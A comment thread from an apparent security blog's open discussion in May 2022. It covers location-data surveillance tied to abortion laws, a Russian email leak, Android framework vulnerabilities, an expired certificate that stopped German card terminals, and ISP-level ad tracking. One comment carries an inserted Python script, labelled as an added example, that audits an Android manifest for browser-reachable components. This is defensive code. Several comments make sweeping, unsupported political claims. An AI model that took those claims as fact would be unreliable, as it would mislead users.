Comments

SpaceLifeForm May 27, 2022 5:42 PM

Frankly, Russia, We don’t give a damn.

hxtps://www.reuters.com/technology/russia-opens-cases-against-google-other-foreign-tech-over-data-storage-2022-05-27/

Ted May 27, 2022 9:47 PM

40+ US congress members sent a letter to Google asking for reforms to data collection and retention practices. The lawmakers are worried how location data could be used to identify women seeking abortions, particularly Android users. The letter notes that:

Google received 11,554 geofence warrants in 2020.

I’d like to know what options are available.

https://www.theverge.com/2022/5/24/23140279/democrat-letter-google-location-data-abortion-surveillance-geofence-warrants

JonKnowsNothing May 27, 2022 10:58 PM

@Ted

re: I’d like to know what options are available.

Can you clarify what you would like to know?

Warrants are issued by LEAs. They are generally expected to be based on some law or prohibited activity that the name(s) are alleged to be involved in. That doesn’t mean they cannot be issued for totally or near totally bogus reasons that at some later date, will see the warrant and charges dropped (after the big PR announcements). The charges can also be molded as things progress, with add-ons and enhancements and changes in the particular legal codes being applied.

Firms of all sorts, including high tech, receive many warrants. High tech companies often publish reports but there are some warrants that have muzzles on them and those won’t be included in the counts.

There will be approx 50% of the USA, where 50% of the population in those States, may be engaged in defined illegal activity when seeking medical treatments. For some States that have this legislation, the cases are criminal and they are subject to the same processes as any other criminal case involving the “death of a person”.

The other States in this category have a different “non enforcement” condition to their laws and violating the law by seeking medical treatment is not enforced by the State. The State has issued a Bounty Hunter Program similar to the bounty programs they pass to kill wolves, bears, mountain lions and other animals deemed to challenge human activities. So the 50% of the populations in those states are subject to the exact same tracking methods used by ranchers, hunters and other big game hunters to collect those fees.

You might want to research Trail Cameras and Fishing Radar systems that are sold in Sporting Goods stores.

Trail cameras take timed images using special LEDs that will illuminate the picture but not “light up” the area like a standard flash. These are mounted throughout a hunter’s targeted range (with permissions etc etc) and capture the movement of the “target animal”. The images can then be uploaded to several sites which will use AI/ML to analyze the image and can provide GPS maps and tracking of specific “trophy” animals. The AI/ML can produce probable location maps of where the “trophy” eats, rests, drinks and their movement thru the day or season. Not unlike what conservation scientists do, but in this case the goal is to kill the trophy animal without too much hiking and wandering about. You go right to their favorite spot. Set up your mono-pod, dial in the range and Bob’s Your Uncle.

Fishing radar works to provide the same information, by tracking schools of fish in a lake or pond, so you can drop your hook right in the middle of the Big Fish and skip a lot of dead casting when the fish are not there.

Big industrial fishing fleets use the same stuff but on a much bigger area with 100% take and a 90% bycatch throw away.

So, 50% of the USA States have targeted 50% of their State populations, some for criminal proceedings and some for a Bounty Hunter program.

Ted May 27, 2022 11:23 PM

@JonKnowsNothing

Can you clarify what you would like to know?

How could Google block the collection of location data that could be incriminating. From the letter:

No law requires Google to collect and keep records of its customers’ every movement. Apple has shown that it is not necessary for smartphone companies to retain invasive tracking databases of their customers’ locations.

SpaceLifeForm May 28, 2022 1:16 AM

@ Ted, JonKnowsNothing

LEA does not need Google or Apple to provide that location data tracking.

The cellcos can do that. If one has to go out of state to get an abortion, then they should leave their cell phone at home.

I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

Seriously, get real. This makes no sense.

If only the congresscritters understood the tech.

Robin May 28, 2022 2:10 AM

“A group of Russian hackers is believed to be behind the release of a cache of emails obtained from a former director of MI6 and other Brexiters unhappy with Theresa May’s failure to negotiate a “clean” EU exit deal.

The former spymaster told Reuters, which first reported the story: “I am well aware of a Russian operation against a Proton [email] account which contained emails to and from me.”

Its goals, the leaked document says, were to “block any deal” to leave the EU arising from the Chequers white paper, to “ensure that we leave on clean WTO terms” and “if necessary remove this prime minister and replace with one fit for purpose”.”

hxtps://www.theguardian.com/uk-news/2022/may/26/hard-brexit-plans-ex-m16-richard-dearlove-hacked-leaked-russians

Leaving aside any questions about the ex-Head of MI6 meddling in politics in such a way, the report appears to show that: (1) in 2018 the ex-head of MI6 chose to use Protonmail, and (2) the hackers seem to have succeeded. Although as far as I know, messages sent by protonmail are only secured if sender and recipient are both using protonmail.

Robin May 28, 2022 2:21 AM

On re-reading, that line: “a Proton account” .. “emails to and from me” does not necessarily imply that it was his account. My bad.

SpaceLifeForm May 28, 2022 4:22 AM

@ Robin, Clive

Partygate

This is some heavy misdirection, IMO. Not on your part, BTW.

The Proton email account described may have been controlled by Boris Johnson.

There is no reason that Russian hackers would be saying this.

Be careful reading anything from Reuters these days.

SpaceLifeForm May 28, 2022 4:56 AM

@ Robin, Clive, ALL

Partygate quantum physics four picoseconds of liminal time

It’s the same on both sides of the pond.

Tory Party is GOP, both brainwashed, blackmailed, bought by Russia.

Absolutely no spine. Even via X-ray. Nothing there.

Anyway, I hope you can enjoy a bit of British humour/sarcasm/snark here:

hxtps://www.theguardian.com/commentisfree/2022/may/27/boris-johnson-sue-gray-partygate

Ted May 28, 2022 7:13 AM

@SpaceLifeForm, JonKnowsNothing

Re: Google location data and abortions

Seriously, get real. This makes no sense.

I know you say that LEAs asking Google for location data makes no sense, especially since “everyone” can track location data: cellcos, apps, public wifi, stingrays, malware, video surveillance… and on and on.

But why would LEAs not ask Google? Are they going to have a gentleperson’s agreement not to query Google about location data and abortion activities?

I honestly feel like the congress people are providing Google a “courtesy” by making this request. If – and ultimately when – Google provides location data in response to a warrant targeting these “criminal” women, it’s going to get extremely uncomfortable and damn straight litigious.

Clive Robinson May 28, 2022 7:37 AM

@ SpaceLifeForm, Robin,

Re : Partygate, quantum physics four picoseconds of liminal time

Not so much “owned by Putin” as “boned by Putin” as was Boris’s predecessor “Handbag Mk II and kitten heel” Mrs May…

With the Star Trek and other SciFi comparisons tucked in the article…

This might cause a small smile, just imagine Boris as that fat Klingon[1] restaurant owner in Deep Space 9 that serves bad food and sings even worse opera[2] 😉

[1] In Boris’s case there has to be a “When the fat lady sings” diva joke in there somewhere…

[2] Ron Taylor (for it was he) was actually way more successful than Boris,

https://heavy.com/entertainment/star-trek/who-played-the-singing-klingon-restaurant-owner-on-ds9/

JonKnowsNothing May 28, 2022 8:08 AM

@ Ted, @SpaceLifeForm, @All

re: Hunting for Big Game Bounty

LEAs do not need “permission” from Google to track people.

Google and other high tech companies of all types track people as part of their business processes.

Corporations in the USA are subject to subpoena warrants for Third Party Documents which include things like CDRs from telcos and receipts from STAPLES.

LEAs may need parallel construction to bring legal cases to court, if they have done their tracking by “other means” DRTBX, STINGRAY.

Having the person leave their cell phone at home, begs the question of how to leave all cell phones and all tracking at home.

  • It’s in the car, it’s in the pocket of the driver, it’s in a neighboring car, it’s at the stop lights, it’s in roving vehicles that specialize in random imaging of traveling persons. You cannot get on a plane without being tracked and filmed, you cannot go to a mall without being On Camera or buy a take away burger without there being some recording of the interaction.

There are the 2 scenarios:

For criminal cases, Google has to have a good push back reason to object to a subpoena warrant.

For Bounty Hunter cases, Google would not have to provide information outside their standard business methods. If they sell your data to others, then they can sell your data to a Bounty Hunter. If not Google, there are many data warehouse brokers who will, plus there are enough LEA-Connected tracking systems that will provide the same data. It’s only a matter of which corporation.

As for targeting, we know a good deal about how that works: Warheads on Foreheads. If you want a trophy bonus, you go where the trophy target is likely to be. All roads may lead to Rome, but there are only so many roads to the destination. These paths are already well known and well monitored and have been used to kill medical personnel in the past.

It’s one reason, some of the SCOTUS justices got a bit nervous when they ran into their own personal experience of finding out that their “privacy” wasn’t there. An open window shade, a step out the front door, a walk to the garage, turning onto the street and having a parade follow you to work.

If you know what the destination is, Bob’s Your Uncle, just wait at the bottleneck.

afaik, the Bounty Hunter program does not require the Hunter to interact with the trophy, all they have to do is file a claim against the selected trophy. (1)

re: I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

This is exactly what the criminal laws are designed to do. It makes great PR on election days. It was done in the past and it will be done in the coming months.

If you wonder how they will know to target a person?

That’s the same way Ads are targeted.
iirc(badly)

A parent learned their daughter was pregnant because she had ordered a pregnancy test from an on-line drug store.

The parent got an email ad from the drug store:

  * Congratulations on your pregnancy!
  * We have a sale on baby diapers!

Of a secondary interest: SCOTUS recently blocked State cases from rising into Federal Courts seeking relief from inadequate Defense Attorney at Trial Time.

This blocks State Criminal cases from Federal Court review.

  • Being innocent is not enough to have a Federal Court review
  • There is no prohibition in the US Constitution against executing innocent people
  • If the State Court finds you guilty; guilty you will remain.
  • The State can apply any penalties their laws provides, including death sentences.

===

1) iirc(badly) IANAL I think these claims run in Civil Courts not Criminal Courts and are $10,000/per. This is the financial limit for many “Small Claims Courts”, where people represent themselves. There is no limitation on the number of claims that can be filed.

Clive Robinson May 28, 2022 9:36 AM

@ SpaceLifeForm, JonKnowsNothing, Ted,

I really can not imagine a scenario where some LEA in Texas gets a warrant to get Google to provide information about person XX that they think is/was pregnant that they think may have crossed the border.

You are jumping two steps ahead instead of just one.

Remember that changes in people’s web searches frequently give away significant information about their health.

So checking people’s “searches” would provide a lot of information, such as searches for out of area / state women’s health services.

After that step pulling travel information gives the potential time and date of the neo-crime.

So going to Alphabet’s Google for both search history and location information is a “one stop” for such LEAs.

But also remember they do not need a warrant for “Third Party Business Records”.

fib May 28, 2022 11:15 AM

@All

Re Privacy, abortion

Of course everyone here knows that it takes very few data points to infer pregnancy:

  • Alice buys a pregnancy test
  • Alice stops drinking
  • Alice starts yoga classes

Bonus: Alice announces pregnancy on Facebook[1]

(*) In ~9 months we want to see Alice’s baby, else investigate/prosecute

[1] Red flags:

  • Alice didn’t post results of pregnancy test
  • Alice takes a break from social media
  • Alice starts visiting certain websites
  • Alice does etc…

Investigate/prosecute NOW

No need to be LEA. Any citizen can have access to powerful ETtL and data analysis tools. Nowadays, this kind of surveillance is certainly within the reach of any institution formed by “concerned citizens” [anti-abortion groups in this case].

Bloated Cow May 28, 2022 12:17 PM

Here is another take on reproductive surveillance:

hxxps://themarkup.org/newsletter/hello-world/the-rise-of-reproductive-surveillance

Having performed IT work in an LEA related office for a while, I think most LEAs have plenty of serious crimes to investigate already without trying to catch women trying to circumvent anti-abortion laws. That is why the laws were written that private citizens can bring the claims.

lurker May 28, 2022 1:37 PM

Location data tracks the device, not the person. Unfortunately the telcos and LEAs will be believed, not the person.

In the case of data from Google, I would want some serious verification of just what it was that they were tracking.

lurker May 28, 2022 1:40 PM

The filter doesn’t like my story of how Google thinks my phone is two different devices 200km apart, or how they could lawsplain that . . .

Clive Robinson May 28, 2022 3:59 PM

@ Bloated Cow, ALL,

I think most LEAs have plenty of serious crimes to investigate already without trying to catch women trying to circumvent anti-abortion laws.

Most LEAs have significant work loads, thus they prioritize crime types to be investigated by four things,

1, Political POV of crime,
2, Public POV of crime,
3, Seriousness of crime,
4, Cost of investigation.

Obviously 1&2 are highly variable and depend on Politics, Religion and MSM.

The seriousness of a crime 3 is also actually a “point of view”…

Some consider abortion “murder” which makes it one of the “high crimes” as far as they are concerned.

But consider also the definition of “abortion” some use, of “termination of fetus”, also applies to any woman on the pill engaging in what are called “healthy sexual relations” with their partner.

Which brings us to the cost of investigation 4, which could by the simple enactment of a State Law make it mandatory for Alphabet / Google and other Social Media to report to LEAs, “Marketing Data” on every woman they consider “pregnant”…

It would be very inexpensive to set up and in some states like Texas with real nut-bars running the place, real easy for Politicians to pass the legislation and start the round ups. In fact with “Private Prisons” it would be highly profitable for certain known friends of the nut-bars.

lurker May 28, 2022 4:02 PM

@SpaceLifeForm, re Quantum Phone

Are you saying Google have solved Schroedinger’s paradox? They can see simultaneously both the dead cat and the live one? Please explain that to a Judge.

JonKnowsNothing May 28, 2022 4:50 PM

@Clive, @All

re: … State Law make it mandatory for Alphabet / Google and other Social Media to report to LEAs,”Marketing Data” on every woman they consider “pregnant”

iirc(badly)
A while back when the roundup of a certain group of people in Mainland China started, and this grouping were sent to “education camps”, there were numerous reports of how data tracking was being done. There were various reports of mandatory smartphone-device use, with periodic “patriotic” check ins, social scoring for reading the “Greater thoughts of the day”, face id, eye tracking and a load of other “apps” that had to be active and used.

There was a report about a specific field in one of the databases that was being populated. It was claimed that the name of the field was badly translated into English and the information in that field was innocuous.

The field title indicated it was tracking monthly cycles and pregnancies. If the field date did not change, after n-days or n-weeks the woman might be taken to a medical person to be checked.

It was not said what the medical person was checking for or what actions would be taken on the findings.

In another country such investigations have also taken place but without the use of tracking devices.

A regular checkup with a MD was scheduled for a particular group of people at a clinic. The people would come and bring their children and families for the medical checkups and given medicines as needed.

The female members of this group also received a regular injection of something “innocuous” (~vitamin booster).

When the birth rate fell in this particular group demographic, someone got curious. That curiosity led to a review and a report and exposure that something ODD was happening at the clinic, with the findings that the MDs were enacting current policy.

In both cases, the groups have fallen far off the headlines, and in both cases the rebuttals were swift and pointed, with the pointy end directed at anyone getting too nosy.

To quote US Supreme Court Justice Clarence Thomas:

[what will happen] if people are unwilling to “live with outcomes we don’t agree with”

Ted May 28, 2022 8:45 PM

From six skin tones to ten.

Many tech co’s have been using the 6-tone Fitzpatrick scale for their visual algorithms. Now Google is starting to incorporate a new 10-tone standard: the Monk Skin Tone (MST) scale.

Google is continuing work to validate the Monk Skin Tone scale in places like Brazil, India, Mexico, and Nigeria, according to a source familiar with the matter.

More details are expected in an upcoming academic research article.

https://www.wired.com/story/google-monk-skin-tone-scale-computer-vision-bias

Erdem Memisyazici May 29, 2022 1:53 AM

Never assume a wild animal’s mood. At least it wasn’t a deadlier predator. The number of trainers eaten or mauled is surprising who approach a wild animal with the assumption that it is safe to do so based on a visual inspection. They are called wild for a reason.

ResearcherZero May 29, 2022 4:01 AM

“We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.”

“…the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.”

“As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device.”

“The apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers,”
https://www.microsoft.com/security/blog/2022/05/27/android-apps-with-millions-of-downloads-exposed-to-high-severity-vulnerabilities/

CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601
https://www.mce.systems/
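
The quoted write-up above turns on an activity declared with the `BROWSABLE` category, which makes it invocable from a web link. As an added example (not part of the comment or of the Microsoft post), this Python script audits a decoded `AndroidManifest.xml` for such components; the manifest, package and activity names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace prefix used by android:* attributes in a decoded manifest.
A = "{http://schemas.android.com/apk/res/android}"
BROWSABLE = "android.intent.category.BROWSABLE"

# Constructed sample manifest; every name in it is hypothetical.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.diagnostics">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".WebBridgeActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="exampledevice" android:host="diag"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="example.com"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def browsable_components(manifest_xml):
    """Return every activity / activity-alias with a BROWSABLE intent filter."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for comp in root.iter():
        if comp.tag not in ("activity", "activity-alias"):
            continue
        browsable = False
        schemes = []
        for flt in comp.findall("intent-filter"):
            cats = {c.get(A + "name") for c in flt.findall("category")}
            if BROWSABLE not in cats:
                continue
            browsable = True
            for data in flt.findall("data"):
                scheme = data.get(A + "scheme")
                if scheme and scheme not in schemes:
                    schemes.append(scheme)
        if not browsable:
            continue
        exported_attr = comp.get(A + "exported")
        findings.append({
            "name": comp.get(A + "name"),
            "exported_attr": exported_attr,
            # A component with an intent filter and no android:exported
            # attribute is exported by default on apps targeting below
            # API 31, so only an explicit "false" closes it off.
            "reachable": exported_attr != "false",
            "schemes": schemes,
            "custom_scheme": any(s not in ("http", "https") for s in schemes),
        })
    return findings


def needs_review(findings):
    """Components a link in a browser could start; review their input handling."""
    return [f for f in findings if f["reachable"]]


if __name__ == "__main__":
    for f in needs_review(browsable_components(SAMPLE_MANIFEST)):
        print(f["name"], "schemes:", ",".join(f["schemes"]) or "(none)",
              "exported attr:", f["exported_attr"])
```
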

Clive Robinson May 29, 2022 4:21 AM

@ JonKnowsNothing, ALL,

That curiosity led to a review and a report and exposure that something ODD was happening at the clinic

Not the first nor I suspect the last.

Have a look back on the history of venereal disease and its treatment.

Specifically syphilis, which if not treated causes brain damage. It’s been suggested from his later life behaviours that English King Henry VIII suffered from it.

Well even when a medical cure was found and available, it was deliberately withheld from certain racial groupings. Even though federal law required treatment be given (for the good reason of keeping it out of the whole population).

The result was that whilst mental illness and other related symptoms passed out of the other racial groups it stayed in the untreated group…

Now consider what would happen with ML if the known cause was kept out of the training data but certain of the mental illness symptoms that turn up on police reports were not.

Now consider the “water treatment” scandals of recent times where chemicals known to have neurotoxicological disadvantages were way way higher in areas where certain racial groups are in higher concentration. When found out the excuses given were “fiscal” but that does not ring true…

ResearcherZero May 29, 2022 4:55 AM

@ALL

Do not bite the hand that feeds you!

People are much easier to control when they have children, …and if they don’t, then it’s time for a little re-education. As long as everyone is busy arguing over ideological catch calls, they’ll never read the finer points of new legislation, and more importantly be able to afford legal representation that does.

The “Handmaid’s Tale” is on the blacklist for a very good reason, too many of the working class now have access to literature, and without the guiding light of their superiors they may become agitated, confused and easily led astray by other malign influences. They may likely begin demanding higher wages, health care, education, and higher taxes for the wealthy. Such demands all threaten profits, the placement of hazardous industry, and its waste. The Devil We Know, respect and worship.

You should all be thankful we began planning to move production to locations such as Xinjiang long ago.
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2072821/

“Despite the veneer of legality, many of those in Xinjiang’s prisons are ordinary people who were convicted for going about their lives and practicing their religion.”

many people have been convicted and imprisoned without committing a genuine offense. These formal prosecutions are distinct from those arbitrarily detained in unlawful “political education” facilities
https://www.hrw.org/news/2021/02/24/china-baseless-imprisonments-surge-xinjiang

“In 2017, detentions of Uighurs, Kazakhs, Hui, and other minorities began to escalate. The first wave targeted Uighur imams and the religiously devout. Soon, prominent academics, novelists, and film directors were also taken into custody. Police and security officers used broad pretexts to justify the detentions, including travelling abroad, having a beard, and owning a prayer rug.”
https://www.newyorker.com/news/a-reporter-at-large/china-xinjiang-prison-state-uighur-detention-camps-prisoner-testimony

Beijing considers “over two million” Uyghurs to be impacted by “extremist” religious thought, and therefore potential targets for re-education. Police spreadsheets indicate that in 2018, over 12 percent of the adult population of one majority-Uyghur county was in an internment facility.
https://victimsofcommunism.org/xinjiang-police-files-press-release/

internment camp security drills, general security drills, safety exercises, surveillance camera screenshots, and so on
https://www.xinjiangpolicefiles.org/images-of-security-drills-and-police-work/

like prisoners in war
https://xinjiang.amnesty.org/wp-content/uploads/2021/06/ASA_17_4137-2021_Full_report_ENG.pdf

bottle of lotion May 29, 2022 5:04 AM

Headquartered in Finland, Nokia builds telecoms networks that enable phones and other internet-enabled devices to communicate with one another.

Asked when he thinks the world will move away from using smartphones to using smart glasses and other devices that are worn on the face, Lundmark said it will happen before 6G arrives.

“By then, definitely the smartphone as we know it today will not anymore be the most common interface,” he said. “Many of these things will be built directly into our bodies.”

Clive Robinson May 29, 2022 6:39 AM

@ bottle of lotion,

“Many of these things will be built directly into our bodies.”

They already are. The simple fact is that the drive for low energy low cost data systems in the consumer market has made the resulting chips a “design-in” for implanted medical electronics.

But also with phones it was made into the basic premise of an episode of Futurama last century with the MomCorp Eye-Phone (Futurama Season 6 Episode 3 : Attack of the Killer App).

https://www.ign.com/wikis/futurama/Eyephone

Winter May 29, 2022 9:48 AM

@ResearcherZero

many people have been convicted and imprisoned without committing a genuine offense.

A very simple summary is:
China is a racist country that uses apartheid policies and genocide [1] to rid itself of non-Han minorities.

Any talk about “extremism” or “crimes” are just as vacuous as the accusations against Ukrainians, Jews, and black people in the Soviet Union, Germany, and Rhodesia, respectively.

[1] Forced sterilization of Uighur women.

Winter May 29, 2022 9:59 AM

@Erdem

They are called wild for a reason.

It takes many generations to domesticate the descendants of wild animals [1]. In some species it might be impossible. Zebras are infamous for their treacherous and murderous behavior. No one succeeded in reliably domesticating them.

Also, wild species harbor new pathogens. Eg, outbreaks of monkeypox have been traced back to imported “pet” animals.

[1] ht-tps://www.sciencealert.com/that-famous-fox-domestication-study-may-have-been-wrong-about-domestication-syndrome

Clive Robinson May 29, 2022 2:23 PM

@ Winter, Erdem,

It takes many generations to domesticate the descendants of wild animals [1].

Some, though they live with us, are neither wild nor domesticated.

We in effect come to a relationship with them, and them with us.

A sub species of the “Felidae” are Domestic cats “Felis catus” they live on a spectrum with three recognised points,

1, house cat
2, farm cat
3, feral cat

And a cat can exist in any one, two or all during its lifetime.

Similar are some of the “Mustelidae” including ferrets “Mustela furo” probably descended from larger european ferrets / pole cats “Mustela putorius” and otters in the subfamily “lutrinae”

Ferrets like cats were mainly only domesticated sufficiently to be “useful to man” in dealing with mice, rats, rabbits and similar vermin; it is only in more recent times that they have become domesticated as “pets”.

There are many stories about ferrets and biting people, but in general providing you handle them frequently and play with them to give them activities to sate their curiosity they are “playful”. Yes they will nip and playfully chew but I’ve not yet been “bitten” even by larger males. Ferrets unlike cats are generally easier to train and respond well to “affection”, and can be “house trained”.

vas pup May 29, 2022 3:58 PM

Two Professors Found What Creates a Mass Shooter. Will Politicians Pay Attention?
https://www.yahoo.com/news/really-consistent-pathway-society-stop-185445896.html

If a satellite falls on your house, space law protects you – but there are no legal penalties for leaving junk in orbit
https://www.yahoo.com/news/satellite-falls-house-space-law-122543931.html

“Imagine that, instead of landing in the ocean, the recent Chinese rocket crashed into your house while you were at work. What would current law allow you to do?

According to the 1967 Outer Space Treaty and 1972 Liability Convention – both adopted by the United Nations – this would be a government-to-government issue. The treaties declare that states are internationally responsible and liable for any damage caused by a spacecraft – !!!even if the damage was caused by a private company from that state. According to these laws, your country wouldn’t even need to prove that someone had done something wrong if a space object or its component parts caused damage on the surface of the Earth or to normal aircraft in flight.”

JonKnowsNothing May 29, 2022 4:23 PM

@Clive, @Winter, @All

re: It takes many generations to domesticate the descendants of wild animals

As noted this doesn’t work in practice. You can raise multitudes of fast generation animals and never hit “domesticated”.

One measure that may be used is:

  • Can the animal forage for itself without human assistance. (1)

Nearly every “domesticated” animal can forage for themselves, after a fashion, provided they are in an environment where there is something to eat. Being locked into a corral with no food, doesn’t count.

Another marker, but not consistent, is:

  • will the animal return to human control without enticements or control methods.

Many animals will do this, even if the human in control does not treat them well.

Most horses will return to their fallen rider after the horse has bucked them off. But there are always some horses who prefer to Head To The Barn leaving their riders Shanks Mare.

There are variations of what domestication means but a very common version is:

  • can we farm them, to kill them.

Animals that have low tolerance for human control (lions, tigers, elephants) often develop very poor relationships, even with their Keepers. People regularly get killed because they forget that from the animal’s PoV, the Keeper is just a nearby snack waiting to get munched on.

The only animals that still remain under the title of “domesticated” are the ones we kill: to eat, for science, for by products etc. The animals rarely get any chance at all to decide if they LIKE humans and want to hang around them. Depending on the animal, it’s 6weeks to 18months before death.

A side issue of this version of domestication, is the near elimination of “previously domesticated animals of the same type but different breed”. The various types of chickens, pigs, goats, and cattle.

Today’s Market Chicken, isn’t the same type of chicken that fed previous generations back thru antiquity. Coq au vin and Meat Marinades made those meats edible (or digestible) after hours of soaking and simmering.

It’s another known fault in modern mass farm production and industrial food supply.

  • Reliance on only a few genetic variations, with humans controlling all genetics of many species both “wild and domestic”.

===

1) Corn, or Maize is “domesticated”. Humans have genetically selected ears of corn for high density kernels. Normally, the kernels would mature and then fall from the cob reseeding the plant. Modern corn kernels are too densely packed and the kernels do not drop from the cob. This allows mass planting and mass harvesting and mass storage of the full cobs.

Maize Corn Crib Husking Shucking.

Clive Robinson May 29, 2022 6:09 PM

@ Bruce, ALL,

I agree; the diver deserved it.

The “presenter” is not really a “diver” and he deserved quite a bit more than just the warning nip he got.

Jig line fishermen who catch the “Red Devil” know full well just how dangerous the Humboldt can be even out of water,

https://www.liveabout.com/fishing-for-giant-humboldt-squid-2929309

There is footage around on the internet showing Humboldt attacking each other, and it’s not the sort of melee you would want to be close to let alone be part of.

ResearcherZero May 29, 2022 10:01 PM

magical “quantum phone”

“a mobile intelligence system that would be a great addition to your investigative and special support offices”
“Turn your target’s smartphone into an intelligence gold mine,”
requires no cooperation from AT&T, Verizon, Apple or Google
https://www.documentcloud.org/documents/6888574-Westbridge-NSO-Group-Brochure-for-Phantom.html

the US Commerce Department blacklisted NSO Group, accusing it of providing spyware to foreign governments who then used the tools “to maliciously target journalists, embassy workers, and activists.”
https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/

no backdoors

“Those candidate algorithms that NIST is running the competitions on all appear strong, secure, and what we need for quantum resistance,”
“We’ve worked against all of them to make sure they are solid.”
https://www.bloomberg.com/news/articles/2022-05-13/nsa-says-no-backdoor-in-new-encryption-scheme-for-us-tech

Quantum Computing and Post-Quantum Cryptography FAQs
https://media.defense.gov/2021/Aug/04/2002821837/-1/-1/1/Quantum_FAQs_20210804.PDF

http://www.nist.gov/public_affairs/releases/joint_quantum_institute.cfm

Penetrating Hard Targets
https://www.washingtonpost.com/world/national-security/nsa-seeks-to-build-quantum-computer-that-could-crack-most-types-of-encryption/2014/01/02/8fff297e-7195-11e3-8def-a33011492df2_story.html

The LQC offers a mechanism for collaborative research between LPS and academia, industry, FFRDCs, and Government Laboratories.
https://www.qubitcollaboratory.org/nsa-launches-lps-collaboratory/

just giving the old squid jig a twirl

Sumadelet May 30, 2022 2:00 AM

I think this deserves a little more publicity:

Verifone H5000 card terminals, used extensively for point of payment card validation in Germany stop working due to an expired certificate. If the terminal is turned off and back on again to reset it, the expired certificate prevents a software update to resolve the problem. The end result is that people cannot pay for goods and services via that terminal. The link is in German.

h++ps://www.borncity.com/blog/2022/05/27/strung-der-verifone-h5000-ec-kartenlesegerte-einige-insights-zur-zertifikateproblematik/

English version

h++ps://borncity.com/win/2022/05/25/nation-wide-disruption-with-verifon-h5000-payment-terminals-in-germany/

Sumadelet May 30, 2022 2:13 AM

Re: Expired certificate in German card payment terminals:

A useful twitter thread in English explaining the issue(s):

h++ps://twitter.com/jwildeboer/status/1530227390286290944

I agree with people who maintain that there should be ‘graceful’ expiry, where the process around certificate use incorporates warnings in advance of the actual expiry date so you don’t get sudden cut-offs for no apparent reason relayed to the end user.

Leon Theremin May 30, 2022 9:05 AM

Here is a rumor about Mark Zuckerberg’s security spending:

“Last I heard, Mark spends ~$24M/yr. on his security detail. He’s got very thick glass installed in his house. 2 foot thick, but I can’t confirm that. It’s not just bullet proof, it’s RPG proof, or something. The optical distortions are quite real through that much silicon and plastic.”

https://news.ycombinator.com/item?id=31328382

I suspect the thick glass is less for physical security and more for electromagnetic security. Optical distortions in non visible wavelengths would ensure outside radar won’t receive useful signal back.

If this was a custom install, not seen even in military bases, tracking other houses with similar glass (or tracking the builder and looking at the clients) should reveal a very interesting clique of people.

Quantry May 30, 2022 12:46 PM

@ Clive Robinson, re #comment-405481

…with “Private Prisons” it would be highly profitable for certain known friends of the nut-bars…

Agreed, but not just private, and not just prisons. Keep in mind the significant motivations for brownie point seeking in the political realm, and penalties for those who scorn it:

h–ps://www.harpercollins.ca/9781443465366/indian-in-the-cabinet

Now, imagine if yer NOT an Attorney General with a staff of 5000 specialists.

Canis familiaris May 30, 2022 4:15 PM

@Leon Theremin

the 2-foot thick glass might be acrylic, as used in the spectacularly large displays in public aquariums. Some of those are 60 cm thick.

https: //www. reynoldspolymer. com/category/aquariums-zoos/
https: //www. advanced-aquariums. com/acrylic/

Alternatively, it could be a layered laminate material, as used in ‘bullet-proof’ screens in banks and military vehicles, but I’m not sure if they are manufactured in that thickness.

SpaceLifeForm May 31, 2022 12:09 AM

@ Sumadelet

https://nitter.net/jwildeboer/status/1531363454648569856#m

Some newer points he made.

The check definitely fails when a H5000 without the December update reboots. And triggers the Secure State. Which renders the device unusable for most payment functions.

Those H5000 without the December 2021 update that were switched on before 2022-05-24 and NOT powered off go into some sort of limbo state where they lose the CertFile(s) that allow the payment app to work and connect to the auth/payment backend. BUT

I do not see any post from him regarding the ‘BUT’, BUT maybe it will be easier to recover if no poweroff occurs now. The terminals do have RS-232 and USB. So, it may be that a new certificate could be pushed to the terminal, which then could allow full recovery. I don’t see the retailers waiting much longer as they can not afford to lose sales.

Looks like no battery though.

hxtps://manualzz.com/doc/27658506/h5000-data-sheet

ResearcherZero May 31, 2022 2:34 AM

TrustPid

Vodafone is piloting a new advertising ID system called TrustPid, which will work as a persistent user tracker at the mobile Internet Service Provider (ISP) level.
Vodafone plans to assign a fixed ID to each customer and associate all user activity with it. The ID will be based on a number of parameters, so that the system will be able to maintain persistence. Then, the mobile ISP creates a personal profile based on that ID and helps advertisers serve targeted ads to each customer.

The new system is in test phase in Germany and is intended to be impossible to bypass from within the web browser settings or through cookie blocking or IP address masking.
https://www.spiegel.de/netzwelt/netzpolitik/trustpid-die-rueckkehr-der-super-cookies-a-6ea53d94-5996-4d6b-aed5-dfb5f51ab942

a “license plate for your brain”

“while these trackers didn’t contain personal information, such as a name or phone number, they could be easily used to identify a person by monitoring their Web habits and cross-referencing it with information that a person volunteers online”
https://www.pbs.org/newshour/nation/verizon-supercookies-spark-calls-federal-investigation

